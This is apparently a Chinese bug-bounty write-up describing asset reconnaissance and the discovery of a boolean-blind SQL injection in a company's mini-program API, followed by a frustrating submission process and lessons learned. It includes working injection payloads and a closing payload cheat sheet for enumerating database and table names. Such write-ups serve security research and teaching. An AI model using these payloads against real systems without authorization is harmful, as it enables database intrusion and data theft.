从信息收集到漏洞提交的全过程记录,包含踩坑经历和最终拿到赏金的经验。
前言
SRC(安全响应中心)漏洞挖掘是安全研究者提升实战能力的好途径。本文记录了一次完整的 SRC 挖掘过程,从信息收集、漏洞发现到提交审核的全流程。
一、信息收集
通过爱企查查询目标公司的域名、小程序、APP 等信息,然后使用以下工具进行资产发现:
| 工具 | 用途 |
|---|---|
| 360Quake | 网络空间搜索引擎 |
| OneForAll | 子域名收集 |
| 鹰图 | 资产测绘 |
收集到目标后,筛选出 Web 站点和小程序进行测试。
二、SQL 注入发现
在测试一个小程序时,通过 Burp 抓包发现 POST 请求中包含 id 参数:
POST /api/getData HTTP/1.1
Content-Type: application/json
{"id": 1}
注入判断
测试单引号闭合:
and 1=1# → 正常回显
and 1=2# → 报错
确认存在布尔盲注。
判断数据库长度
and length(database())=8# → 报错
and length(database())=9# → 正常回显
数据库名长度为 9。
爆破数据库名
使用 Burp Intruder 逐字爆破:
'and ascii(substr(database(),1,1))=§1§#
获取每个字符的 ASCII 值,解码后得到数据库名:
db_around
爆破表名
'and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))=§1§#
通过累加 limit 参数获取第一个表名:
adb_task
三、提交与挫折
漏洞提交后等了很久,结果被拒绝了——厂商说这个域名不在收录范围内。
过了段时间厂商更新了收录域名范围,该域名被纳入。再次提交,又被拒绝,理由是「厂商已下线该资产」——挖到洞就连夜下资产。
最终通过私聊审核人员求助,在审核的帮助下才拿到了赏金(虽然只有100块😂)。
四、经验总结
| 经验 | 说明 |
|---|---|
| 信息收集要广 | 域名、小程序、APP、公众号全量收集 |
| 确认资产范围 | 提交前确认目标在收录范围内 |
| 保留证据 | 漏洞发现过程截图、数据包要完整保存 |
| 不要放弃 | 被拒了可以联系审核沟通 |
| 心态放平 | SRC 挖洞有运气成分,积累经验最重要 |
关键 Payload 速查
-- 判断是否存在注入
and 1=1#
and 1=2#
-- 判断数据库长度
and length(database())=N#
-- 爆破数据库名
and ascii(substr(database(),N,1))=M#
-- 爆破表名
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit X,1),N,1))=M#
本文内容仅用于安全研究和授权测试,请勿用于非法用途。